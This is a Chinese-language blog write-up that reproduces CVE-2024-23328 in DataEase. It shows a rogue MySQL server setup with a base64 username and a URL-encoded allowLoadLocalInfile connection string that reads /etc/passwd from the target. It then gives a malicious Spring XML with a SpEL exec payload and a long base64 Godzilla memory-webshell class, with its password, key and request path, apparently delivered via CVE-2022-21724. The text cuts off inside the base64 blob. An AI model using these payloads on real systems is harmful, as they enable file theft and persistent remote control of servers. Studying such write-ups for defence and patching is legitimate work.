jdr HomeArchivesAbout
CVE-2024-23328 DataEase jdbc反序列化漏洞复现
|渗透测试

前言

有人问我这个漏洞怎么复现,恰好就来看看。

https://forum.butian.net/share/2848

image

环境搭建

本人选择的是离线搭建

教程

https://dataease.io/docs/v2/installation/offline_INSTL_and_UPG/

下载地址

https://community.fit2cloud.com/#/products/dataease/downloads

image

安装

先解压压缩包

1
tar zxvf dataease-v1.18.14-offline.tar.gz

进入安装包目录

1
cd dataease-v1.18.14-offline/

运行安装脚本

1
/bin/bash install.sh

image

漏洞复现

参考文章
https://forum.butian.net/share/2848

准备工作

先下载好存在漏洞的mysql jdbc驱动版本的jar

我使用的是mysql-connector-java-8.0.19.jar

上传驱动

数据源->驱动管理->添加驱动

image

驱动类填com.mysql.cj.jdbc.Driver

image

点击保存

漏洞触发(文件读取)

新建数据源->选择mysql

数据驱动选择刚刚添加上传的驱动

image

通过这个工具https://github.com/4ra1n/mysql-fake-server

启动恶意的mysql服务

image

用户名处填入

1
base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=

额外的JDBC连接字符串填入

1
characterEncoding=UTF-8&connectTimeout=5000&useSSL=false&allowPublicKeyRetrieval=true&%61%6c%6c%6f%77%4c%6f%61%64%4c%6f%63%61%6c%49%6e%66%69%6c%65=%74%72%75%65&

url编码处的字符串为allowLoadLocalInfile=true

image

然后点击校验

恶意mysql服务器端(192.168.1.101)收到DataEase(192.168.1.103)端的mysql连接请求

image

生成了新的文件目录

image

成功读取到DataEase服务器上的/etc/passwd文件的内容

image

内存马注入(哥斯拉)

此处内存马注入是通过CVE-2022-21724 漏洞去注入的,也就是PostgreSQL JDBC漏洞。

先准备一个恶意的xml文件,其文件内容是

1
2
3
4
5
6
7
8
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                        http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="world" class="java.lang.String">
        <constructor-arg value="#{T (java.lang.Runtime).getRuntime().exec('calc')}"/>
    </bean>
</beans>

可以看见这里是有一个spel表达式的。

将其spel表达式修改成以下代码块,也就是注入一个哥斯拉的内存马。

相关配置如下:
密码:pass123
密钥:key123
·请求路径: /api/user
请求头: Referer: https://www.baidu.com

spel表达式如下:

1
2
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('ch.qos.logback.e.EncryptionUtils',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADEBRgEAIGNoL3Fvcy9sb2diYWNrL2UvRW5jcnlwdGlvblV0aWxzBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADWdldFVybFBhdHRlcm4BABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAiTGNoL3Fvcy9sb2diYWNrL2UvRW5jcnlwdGlvblV0aWxzOwEAAi8qCAAMAQAMZ2V0Q2xhc3NOYW1lAQAwY29tLmZhc3RlcnhtbC5qYWNrc29uLkNvbnRleHRMb2FkZXJZYUludGVyY2VwdG9yCAAPAQAPZ2V0QmFzZTY0U3RyaW5nAQAKRXhjZXB0aW9ucwEAE2phdmEvaW8vSU9FeGNlcHRpb24HABMBABBqYXZhL2xhbmcvU3RyaW5nBwAVAQ9USDRzSUFBQUFBQUFBQUpWWENYZ2J4UlgreDVLOXNpeVNZQ2NPSmdrNWdFU3liTXNKaVpQWUhENWlzTUZ5UWh3Y25MU2xhMmx0SzVZbHNWcjVJa0FwUittWmx0S0RIclJOVzlJanRJR0FiSk1DNlFHMDlLSUhwUzB0dmVnSnBlbGRXc0Q4czd1UzVZdWszMmZ2cm1iZWUvUG1mLzk3YitieFZ4NTRDTUI2NFJlb0RzVUhBajFxMHREMDRZRm9ZSjhhNmsvR1k0R21lTXpRaG8yMnVCclc5QzYxbGIvMGtKWXc0cm9DSWJCa256cW9CcUpxckRmUUZGV1RTVXRPZ1VOZ2MxenZEU1FUZWlUVzI2T3JBOXBRWE84UERHbmRnYVNtRDBZMUk5Q1FISW1GV3RSWU9LcnAwK3ptQ3hTY0g0bEZqQXNGSEY1ZnA0Q3pLUjdXQkJhMlJXSmFlMnFnVzlOM3FkMVJqaFMzeFVOcXRGUFZJL0szUGVnMCtpSkpnUTF0LysrVzZqeFE0SExEaVFVQ1ozcmI1dHhjblhSSWpBb3NuV2RlR2xra2paUlFaa3FrdzVCUU5LWWlVUk9oSlc2VXltV2NDV3JLamN5VXBKMHpVRmFJUEp4SlBOUkVRb3VGQlNxOXN3VjlzNGJzVldoaU9WYkloYzRpa3YzYWlBZXJMSk9yQlZ4RzNCSVdXT3lkYllLNlorTWNxWHN1ZFFmQ213VFdudExhVkZ3SHI1dUwrT1NYdVJ6NUpTNG5XN3g3RzMwelVhc1R5QXQxODdHM1VhQW9yUFV3eHVZRTBhTjhhK3RzRFEvV1k0TkUrRHphSFJaUUtMZkhKL1ZMcGtTYmgyVlFJL0dZZ3MwVUMzRjUwOUJ3SUtTUE1OcUJwa2lpanhneEJJT3F2akV6UFVPWjA0S2VpQUgrNzFGUWJTOHh3NGlDQm9IVE9nd3lMS2dtYkJvNkdwbzdYTmpHVGZWcVJtc3NhYWl4RUlkOTg2STQwek1QTHNZbGJqU2lSV0RsTklGa1Fnc0ZPclNRcmhtWGFTTWQvS1hnVW9GRk13MHJhR09ndVh6amlLRnhHMDR2VWZLZ0hkdmRDR0tIaGZBYzduUktEdTkwNHpKMFVFbW1vaFJ0dFNTVFdpaWxSNHlSQUpjMlJhOUFwL1J5TndNUmpsOGNpYWxSRWxhR1dxN1ZoVDF5Y3E5QVlVTFhySFFYQ0h2dEhXZUtRWjloSkFJdGZIUllBenUxcTFOYTBxZzdxVmd5RVk4bHRicWNUV3p2M3FlRmpEcmZIb0ZWVTZOV0FJeUlLcU9hdzQycnBrdEZvMXF2R20wSWhiUmtNa2RLWmZoN3BtZXB2UXdudUovY21PN1VlcUtjaVF4cTJ4T2FQbjI5T3BuS3VyNDlSVUJYV2pxUmVFQkdwMEhYMVJHT0oxSUdvNkNwQXhSVmt2U0NXblJ4Zmh4TUNjbmlzR3JRVFVXM2tCTllkNG9Ra3lHNkRXTm1JNmNBT0ZmcXMycTN3Rm12N1p5Q3F3WE9QU1ZuRkpDbGEwL05CUVdwYVpTM0FxSmdTR0RGYXlLcllNUmU1T1FCVTNDTmdMdFBrNVc5blYzTWcydXRrbllkQ2MzRWFqRm5QSGdUdkVVd2NBT3ozUkx1VktNcFN0OW9TZDlFa0VQc08yb2t4ZzB1bTlaYStsUzlRKzZlMVlHazllQVd2RVZtNTYxY2x3dDBaQ2l3eHVzN0dRazhlQnZlTHQxNGg0Q0h1anRVMlhnTjZkKzdMUDhPME92dW1vM2J0SkRaVUV2bnFrVXlhOStEMjJRRmY2OEhtMUFqdjk3SGVDZlVrU2hibkFzZnNNdzNHTlRvVGhuYXlWdURuU3dlM0lFUEZVSEhoNjJ5Wk5mNUV1OWNOZjZqdU5PTllYeU1mWC9HcElKUENDekk2RnR0VjZCc3RwVnNSLzRrUHVYR1FYeGFicVhFZzBwVXlhL1BjQi9KYWZ0WU44Yys1aWd0TEhxZncrZmxSZzR6U29rTXpFa1h2aUJSUHV6R3FPenRSVEZ0YUtyd1QrK3lXVVR1eFZIcDJuMDhjZVJRTXNWU05hRGwwREF0Y0VhdWM3djY5UGlRYkRSMnRSNTNZd3dUTEMra2tocE55bVk3VjAzMDRCaStKR0Y5ME9MdmJsWnlDZDdTakhOTW1oM2N0ajFCL3g3RzhTSU00c3VVVDZhNmsvYVJvZFE3dlRGbmUvOVg4VFhKM2tjeXZYaTZQUVdQQ2VRUHllOFpIdWEwbm0vZ2NUZStqbTlLTjNuNEtETGkyVFQyNER1eWQ0M2l1d3hkdDVyVWFqWTJ4ekpjbm42NHlIcjBQWHhmQnZzSGNzSDVmSDVTK3Z3anhqS0xPQkZjTWFQZkJabG1hcSsyTGRKcmxVMEgyeStmd1cyYlhIaWFXZjBhMGdwK0xyQisvaVNaWncxNUF2aUZHOC9nbHd4c1ZJdjFHbjNta2JqVmcxL2pOOUxuWnptUlNyRDBhOVl4aUZFaGdyL0Q3NlhXSDBnNjAveUFhdlFGR2lPOThxemJLNlB3SjZxRnpUVThlRjRpK2d6K0xKdDJLekUwNmZRWE41N0RDWGtHZkZKKy9jME13eFU4aE9wTlJOMkRmOGl6WVJELzVLcFdBTWloQWlzZ0FxZlBjY2FUaDZ3YW52SzZDV3orb0N5T2R2R3VTaG1SYUZXanFlckN5elRZRXpkTExYdkdTYXBLcGxKTU1uQTRLSVJWTVcxL1hJS1hrT0s5czhRVmtXOVJQNmdaZlhFZXFldm5XR1cyV3U2NnV0VXdBcGFGT285UWhFczZVRWpTNzUyZGRZb29ZdkxPcDY2STB3aGRKRFlZNytlV3Q4NlJ0WE9Zbkt1U2lJVmlrVnNzRUtlek5tb21CcnZzRTc1TDhDcFNta3pGcWdZaXlWQlZZME5IY3ladkNOTVNXVFRNSHk2eFZKN2hORHVlRWt5clUxQktYa0tzR1pkWVB0dGFWbzQzRFk4bDE1anE2WkVqcTFqcnp3OUY3UXVkSXU4NzZ6ZWM1eEpua3dEaExacTYrYndOTlZxTkZ0cTBkWDJOU3pEaEZUWmtUWmVxNjVpenNzc2xhd09Cb2FHaHFtNDFFazVWOFZybkVqNnNabEk3UWJlUWowSjUwK0JWMWlYdlRPWjdsZmtXc2wyYjd4dk5keUcvZU1YanM1Qy9HbWhCOEYxU1BvYUY1U1hDZXordTU2djhmdHg4RDRmenlDcEExZzd3SGxXTUZTamlsOGRTNGZzMDB6QXZlN2E1S0NXbGJIVzVmd3lMcDlzN2h0S3VNU3k5Rjh2U1dIa3YxdkNaeHRweGxCOUZ4ZFJhQytEZ2N4V3RyMFlBYTh6MVNpMmI5bnJ5NjNUNndtT243R0wyeWhjUUNDbFZXTzUzK0I4YXc4WWpXWk1GcHJ0cmMwd1ZaazBWY3BGcTB4Uzd2RzNxS1dvNCtmWVhONCtqdGIxeStSMVFuSWZnekQrR3k3cE14eTh2Ymg3RHJqU3VyUFNuOGJvajdlS0l1UVF2ZmRoQy85M21Rdmw4VnRCVUpYZFJ4WmtBZkZ4S09yR1Jjd1VjM1lwYVN2dm9VaDNPTi9mdHp6cm01NDZxVGF0K1hJaUxLTlBFYjBwTllpR2NDdklVMUF1RjF3cjVtT1JVN2hnL0dzVWtsc0poRDBxcExiVDJlcnlCbHJqSlBJOUpHZUNFdi93K1hEK0JOK2ZoVVR3NzlZTWZONmZ4MWp2d2hIOEM3eFNvZGZvWnVRbThPdy9qdUwwMnY3d3MzNUhHKzJ2enk1ekZINXpBUi9Md0dOYkk3MlBJNnlwUDQrTnAzRFdHUTJYNWFYeDJBbmM3Y0FnMytZdS9XSlkvZ1NNT2R1QlJjdUdlMm9LczluRWNUT1ArV3VVUUZ0YTZqbUdzcTh3MWhnY2VMbFBLQ3RKNGFIZVo0cGV2aWdsOFJmQzhVT0ZZdENpTlI5UDRWcG1TeHJmdDhYSXArNFNUYm8zamg1ekxTa3ZocHpqZ09PdzhMQSt1T0lEYjhFYjczVzFIYkNjVzgxbEQzbTFtVExid3VSWDFqRkFibzlQUGFLUVloK3VZTUFld2pWcU51SjBSdVJQTnVBdVg0RzYwOEpUUWlrZHdLWjdtbmZGNU5vWVhzTjJNZGcrdEgrQWFJWVNaS2Jmemw4WXhGMjNGMElzK011Rk9Ya2V0V1I4dFJMQ1A5TnZNczB3L0dTQlpkQ0xMaWhQTXNBR1RGU2VvSFRmSmZBSUo2anBNZnRRZy8yWDBLMkIvcTU4azVSVXovdXk5Z3dxR3JXR0ZSd2V5WWY5TEtPTFlpd2krU0hzL2xnVGllNHRaUnJ4MklwRHpKaXVyUlZ2eHo4YnhxMkFGQTN1NWc0L2ZwdkhIWTNpdXkxbVJ4Z3RqK0tzRStPOXAvS3VOS2tHL3pBWXlpTXpQWk1OWjNCdXdpNk9kM1BsdUxNR1ZuTjlEaVM3bXhsNFRwMVdVZFRFckxzUlA3SHkvd0N4WWVaVDRLYitFdWNNUzVFMVNqYnNLOHMvaU5aM2xDY2NpdGdpYTFSRFlUNmRmR1JkNXdZb1M0UlRIUlVGYXVDdjQ5cVJGY1hzbENWb2lGanNmeE1FdVIzRjlCK2NxK1dPNHkxSE83K0xqQ0hJbmRlMGxvdFMwSUpucExIT2FTbWZrS3BVNVoybmxNMU9PbUdYd0lwSmtDNTFPOFJDWEFXSURRd2xjeGRsdWJqYkVvaHFtWEpTU0dpVjdTWjgrN0NBRlVneitNSWt3eW5CTGNGb0k0SEllUmY1dGh0cEZXdjRITDlMS0RweHJqam1wV1dXUE5aRTgvN1VMeW43OGowQktFRWZ4VWhaRW55d2pacG1vejRBNHlRTG90SCtidFlLUG1jemdsY2dHdWNzRytkWWNrSmZORGZJS0c2L2diSkRyclQrQzFrQ29WODZDZW5XdTZneW9wM1NuQUc4bVRGdVloVGZncGhtQVg4M1pGR0ViSkloRGxMdWVrc09VSENXQTE1Q1QrNmx6SGJXdTVkWHpoaHpBZmFMTUJyemVCcmNUZm5QTVNjMk45bGdybVpvQi9GWUNickgyRmdKZW5RdDRpODNhZWh2d09nbTQrWHR1d0YxaVRiWlBONXNwUVVNbDRweWpXRllpMWg3Rm1wTjFWSkh0M2g3NjVNV1p3S3NMRDZvVzhCWUFBQT09CAAXAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAZABoKABYAGwEAAygpVgEAB2NvbnRleHQBABJMamF2YS9sYW5nL09iamVjdDsBAAtpbnRlcmNlcHRvcgwAGQAdCgAEACEBAApnZXRDb250ZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMACMAJAoAAgAlAQAOZ2V0SW50ZXJjZXB0b3IMACcAJAoAAgAoAQAOYWRkSW50ZXJjZXB0b3IBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMACoAKwoAAgAsAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcALgEAEXJlcXVlc3RBdHRyaWJ1dGVzAQALaHR0cHJlcXVlc3QBAAdzZXNzaW9uAQAOc2VydmxldENvbnRleHQBABNhcHBsaWNhdGlvbkNvbnRleHRzAQAZTGphdmEvdXRpbC9MaW5rZWRIYXNoU2V0OwEAEmFwcGxpY2F0aW9uQ29udGV4dAEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHADkBAA1TdGFja01hcFRhYmxlAQAQamF2YS9sYW5nL1RocmVhZAcAPAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAPgA/CgA9AEABABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DABCAEMKAD0ARAEAPG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5SZXF1ZXN0Q29udGV4dEhvbGRlcggARgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAEgASQoAOgBKAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMIAEwBAAxpbnZva2VNZXRob2QBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwwATgBPCgACAFABAApnZXRSZXF1ZXN0CABSAQAKZ2V0U2Vzc2lvbggAVAEAEWdldFNlcnZsZXRDb250ZXh0CABWAQBCb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5zdXBwb3J0LldlYkFwcGxpY2F0aW9uQ29udGV4dFV0aWxzCABYAQAYZ2V0V2ViQXBwbGljYXRpb25Db250ZXh0CABaAQAPamF2YS9sYW5nL0NsYXNzBwBcAQAcamF2YXguc2VydmxldC5TZXJ2bGV0Q29udGV4dAgAXgEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwATgBgCgACAGEBADFvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5MaXZlQmVhbnNWaWV3CABjAQALbmV3SW5zdGFuY2UMAGUAJAoAXQBmCAA0AQAFZ2V0RlYMAGkATwoAAgBqAQAXamF2YS91dGlsL0xpbmtlZEhhc2hTZXQHAGwBAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMAG4AbwoAbQBwAQASamF2YS91dGlsL0l0ZXJhdG9yBwByAQAEbmV4dAwAdAAkCwBzAHUBADVvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LldlYkFwcGxpY2F0aW9uQ29udGV4dAgAdwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAeQB6CgAEAHsBABBpc0Fzc2lnbmFibGVGcm9tAQAUKExqYXZhL2xhbmcvQ2xhc3M7KVoMAH0AfgoAXQB/AQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HAIEBACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uBwCDAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAhQEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uBwCHAQATamF2YS9sYW5nL1Rocm93YWJsZQcAiQEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247DAAOAAYKAAIAkwwAEQAGCgACAJUBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDACXAJgKAAIAmQEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDACbAJwKAAIAnQgAjQcAjAEAEWphdmEvbGFuZy9JbnRlZ2VyBwChAQAEVFlQRQwAowCQCQCiAKQBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAKYApwoAXQCoAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwCqAQANc2V0QWNjZXNzaWJsZQEABChaKVYMAKwArQoAqwCuAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMALAAsQoAogCyAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAC0ALUKAKsAtgEAFmFic3RyYWN0SGFuZGxlck1hcHBpbmcBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAHZ2V0QmVhbggAvQEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcIAL8IALkBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwDCAQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDADEAMUKAMMAxgEADGRlY29kZXJDbGFzcwEAB2RlY29kZXIBAAdpZ25vcmVkAQAJYmFzZTY0U3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAUTGphdmEvbGFuZy9DbGFzczwqPjsBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyCADOAQAHZm9yTmFtZQwA0ABJCgBdANEBAAxkZWNvZGVCdWZmZXIIANMBAAlnZXRNZXRob2QMANUApwoAXQDWAQAQamF2YS51dGlsLkJhc2U2NAgA2AEACmdldERlY29kZXIIANoBAAZkZWNvZGUIANwBAA5jb21wcmVzc2VkRGF0YQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAJpbgEAHkxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtOwEABnVuZ3ppcAEAH0xqYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbTsBAAZidWZmZXIBAAFuAQABSQEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwDoAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcA6gEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwDsCgDpACEBAAUoW0IpVgwAGQDvCgDrAPABABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABkA8goA7QDzAQAEcmVhZAEABShbQilJDAD1APYKAO0A9wEABXdyaXRlAQAHKFtCSUkpVgwA+QD6CgDpAPsBAAt0b0J5dGVBcnJheQEABCgpW0IMAP0A/goA6QD/AQAFc2V0RlYBADkoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9PYmplY3Q7KVYBAAR2YXIwAQAEdmFyMQEAA3ZhbAEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAQYBBwoAAgEIAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAQoBAANzZXQMAQwAKwoBCwENAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7CgELAK4BAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwBFAEVCgELARYBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HARgBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMARsBHAoAXQEdAQANZ2V0U3VwZXJjbGFzcwwBHwB6CgBdASAKARkAGwEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAAFpAQAHbWV0aG9kcwEAG1tMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vz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